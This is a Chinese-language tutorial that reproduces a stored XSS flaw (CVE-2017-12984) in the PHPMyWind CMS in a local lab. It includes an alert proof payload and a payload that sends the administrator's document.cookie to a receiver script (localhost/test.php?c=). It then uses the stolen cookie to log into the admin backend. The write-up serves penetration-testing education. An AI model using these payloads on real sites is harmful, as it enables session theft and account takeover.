众所周知,我们一般将XSS分为三类,反射型、存储型、DOM型,反射型XSS这个基本可以说是没什么利用价值,因为它是不能留存下来的,你改变数据执行了一个临时的XSS,但这个数据没有存储到服务器、数据库中,不能再次展示给别人看,其他人进入同一页面请求服务器并不受你的脚本影响,DOM型XSS也是一样,它就是通过影响前端的DOM环境来执行一些js脚本,执行的脚本并没有留存下来,所以危害比较大的还是存储型XSS,也叫永久型XSS。
平常在我的渗透测试工作过程中,不管是什么类型的XSS问题,验证存在XSS问题也就js一小段脚本弹一个框,证明存在即可,但实际上,作为一名高级渗透测试人员肯定是要知道对于存储型XSS,针对这种漏洞,如何搭建环境接受跨站攻击获取的数据和利用的一整套流程。另外再补充下,只要是能让你输入的地方,留言、评论甚至URL上的参数等,你都可以试一下,还有验证XSS时候,不要只会一个<script>去alert,用<img>报错执行、<a>超链接执行JAVAscript伪协议都可以,实际上将<、>这种特殊符号及编码过滤就已经能解决XSS很多问题了。
这次来复现的漏洞是存储型XSS,它的CVE编号是CVE-2017-12984,它是一套基于php环境的CMS系统——PHPMwWind,漏洞版本号<=5.4,所以这里的系统我还是放在phpstudy这套集成环境里,漏洞位置位于用户留言功能里。
安装不说了,看下这个漏洞存在的位置在于message.php虽然对于用户的留言进行了实体编码过滤,这使得js脚本仅对于当前页面无法执行content的脚本内容,但是它任然被正常插入存到数据库中。
但真正的使这个脚本产生影响的就是位于/admin/message_update.php后台管理页面,未将content内容做任何处理,就直接取出来显示,造成的跨站脚本攻击。
首先漏洞验证,这个我不贴图了,payload就<img src=0 onerror = alert(/xss/);>就行了;输入的是在用户留言页面,产生的XSS是在管理员的留言功能管理页,点击修改即可触发。
再次,我们插入攻击脚本攻击获取的数据怎么接收,你得需要写个简单的test.php脚本去接收数据,你可以自己去搞一套云服务器环境,这里我为了方便,就和本地环境放一起了,这里用的是php脚本,肯定需要在php的环境下接收,脚本内容如下:
这很清楚了,通俗易懂,接收到获取的参数c的值,然后把它写到getC.txt中,就是这么简单,再在同一目录下建个getC.txt等着收数据就行了,先测试检查下是否可行,URL加个参数值cc,打开getC.txt查看没问题。
好了,现在构造我们的攻击脚本,这里我是利用报错执行方法,添加一个img字节点,设置它的属性,图片来源为我们接受数据脚本的地址,而取得的cookie却是查看这段代码用户的cookie:
<img src = x onerror
=document.body.AppendChild(document.createElement('img')).setAttribute('src','http://localhost/test.php?c='+document.cookie);>
登录后台管理员,进入留言管理模块,点击留言修改按钮,触发XSS,这里为什么两个图片标记,第一个使我们插入的<img>图片标签,第二个是我们的onerror执行的脚本内容,添加子元素节点标签<img>,因为跨站脚本(XSS)能够执行,所以我们这个子元素<img>标签能添加,可以看到第二个标签src来源是我的cookie接受的脚本,我的参数c已经获取到了我要的cookie,为什么能够传过去,因为网页要加载这个<img>图片,它需要向它的源服务器进行GET请求,所以就会将我获得的cookie以GET参数传过去。
现在检查一下我获取的数据小文本getC.txt有没有得到,果然:
会话凭证cookie已得到,剩下的就简单了,老兵cookie欺骗工具,放入我们拿到手的cookie,成功进入管理员后台,这就是恶意攻击者利用跨站脚本窃取会话凭证的大致流程,也证明了它的危害。